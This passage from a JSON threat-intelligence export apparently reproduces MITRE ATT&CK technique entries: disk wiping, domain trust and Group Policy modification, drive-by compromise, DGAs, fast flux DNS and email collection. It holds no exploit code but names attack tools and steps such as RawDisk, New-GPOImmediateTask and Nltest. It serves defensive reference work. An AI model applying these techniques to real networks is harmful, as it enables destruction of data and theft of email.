"description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) to directly access disk content.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> This behavior is distinct from [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1561.001"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "761fa7fa-d7e1-4796-85b3-5cd37d55dffa",
"value": "Disk Content Wipe"
},
{
"description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) may be performed in isolation, or along with [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `format`.<sup>[[format_cmd_cisco](https://app.tidalcyber.com/references/9442e08d-0858-5aa5-b642-a6b1e46018bc)]</sup>\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1561.002"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "14a944d3-ab95-40d8-b069-ccc4824ef46d",
"value": "Disk Structure Wipe"
},
{
"description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `erase`.<sup>[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
},
{
"dest-uuid": "761fa7fa-d7e1-4796-85b3-5cd37d55dffa",
"type": "similar"
},
{
"dest-uuid": "14a944d3-ab95-40d8-b069-ccc4824ef46d",
"type": "similar"
}
],
"uuid": "ea2b3980-05fd-41a3-8ab9-3106e833c821",
"value": "Disk Wipe"
},
{
"description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.<sup>[[Microsoft - Azure AD Federation](https://app.tidalcyber.com/references/fedb345f-b5a7-40cd-98c7-6b14bab95ed9)]</sup> These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://app.tidalcyber.com/technique/dc0aecef-3cb2-4381-b6e4-dfa7be16d42b), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.<sup>[[AADInternals zure AD Federated Domain](https://app.tidalcyber.com/references/d2005eb6-4da4-4938-97fb-caa0e2381f4e)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1484.002"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1",
"value": "Domain Trust Modification"
},
{
"description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup> \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6), [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242), [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and more.<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup><sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup><sup>[[Microsoft Hacking Team Breach](https://app.tidalcyber.com/references/8daac742-6467-40db-9fe5-87efd2a96f09)]</sup> Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup>\n\nFor example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml</code>.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.<sup>[[Harmj0y SeEnableDelegationPrivilege Right](https://app.tidalcyber.com/references/e8f7df08-1a62-41d9-b8a4-ff39a2160294)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1484.001"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac",
"value": "Group Policy Modification"
},
{
"description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.<sup>[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)]</sup> Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
"meta": {
"platforms": [
"Azure AD",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1",
"type": "similar"
},
{
"dest-uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac",
"type": "similar"
}
],
"uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9",
"value": "Domain Policy Modification"
},
{
"description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.<sup>[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)]</sup> Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).<sup>[[AdSecurity Forging Trust Tickets](https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)]</sup><sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.<sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.<sup>[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "93bd112e-9494-4b60-bdc5-8b610c7ebe21",
"value": "Domain Trust Discovery"
},
{
"description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.<sup>[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]</sup>\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.<sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381",
"value": "Drive-by Compromise"
},
{
"description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup>\n\nOne implementation of [DNS Calculation](https://app.tidalcyber.com/technique/e9cc000d-174e-4e6c-9513-a0c000061700) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup><sup>[[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]</sup><sup>[[Rapid7G20Espionage](https://app.tidalcyber.com/references/2235ff2a-07b8-4198-b91d-e50739e274f4)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1568.003"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "e9cc000d-174e-4e6c-9513-a0c000061700",
"value": "DNS Calculation"
},
{
"description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Unit 42 DGA Feb 2019](https://app.tidalcyber.com/references/5e1db76a-0a3e-42ce-a66c-f914fb1a3471)]</sup>\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[Akamai DGA Mitigation](https://app.tidalcyber.com/references/5b14cdf6-261a-4d7e-acb4-74e7fafa9467)]</sup>\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1568.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "b0be2e07-e4b4-4f1a-8fce-c7a1e820a817",
"value": "Domain Generation Algorithms"
},
{
"description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.<sup>[[MehtaFastFluxPt1](https://app.tidalcyber.com/references/5f169cae-6b59-4879-9a8f-93fdcea5cc58)]</sup><sup>[[MehtaFastFluxPt2](https://app.tidalcyber.com/references/f8a98e55-c91e-4b5e-b6f3-0065ef07375d)]</sup><sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.<sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1568.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "abae30c8-c6b0-46ae-b464-44b66412065f",
"value": "Fast Flux DNS"
},
{
"description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "e9cc000d-174e-4e6c-9513-a0c000061700",
"type": "similar"
},
{
"dest-uuid": "b0be2e07-e4b4-4f1a-8fce-c7a1e820a817",
"type": "similar"
},
{
"dest-uuid": "abae30c8-c6b0-46ae-b464-44b66412065f",
"type": "similar"
}
],
"uuid": "987ad3da-9423-4fe0-a52b-b931c0b8b95f",
"value": "Dynamic Resolution"
},
{
"description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victims organization to use as part of further exploits or operations.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup> Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup> Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.<sup>[[Microsoft Tim McMichael Exchange Mail Forwarding 2](https://app.tidalcyber.com/references/b5bf8e12-0133-46ea-85e3-b48c9901b518)]</sup><sup>[[Mac Forwarding Rules](https://app.tidalcyber.com/references/0ff40575-cd2d-4a70-a07b-fff85f520062)]</sup>\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup>\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1114.003"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "59db734e-9edb-4c92-b2ca-a72fe1e08ac7",
"value": "Email Forwarding Rule"
},
{
"description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.<sup>[[Outlook File Sizes](https://app.tidalcyber.com/references/6fbbb53f-cd4b-4ce1-942d-5cadb907cf86)]</sup> IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.<sup>[[Microsoft Outlook Files](https://app.tidalcyber.com/references/29f4cc6b-1fa5-434d-ab4f-6bb169e2287a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1114.001"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "9a388756-9de0-45ea-9820-810443733789",
"value": "Local Email Collection"
},
{
"description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://app.tidalcyber.com/software/d762974a-ca7e-45ee-bc1d-f5218bf46c84) can be used to automate searches for specific keywords.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1114.002"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "5de59320-1471-4715-99c4-eda2f7996d07",
"value": "Remote Email Collection"
},
{
"description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "59db734e-9edb-4c92-b2ca-a72fe1e08ac7",
"type": "similar"
},
{
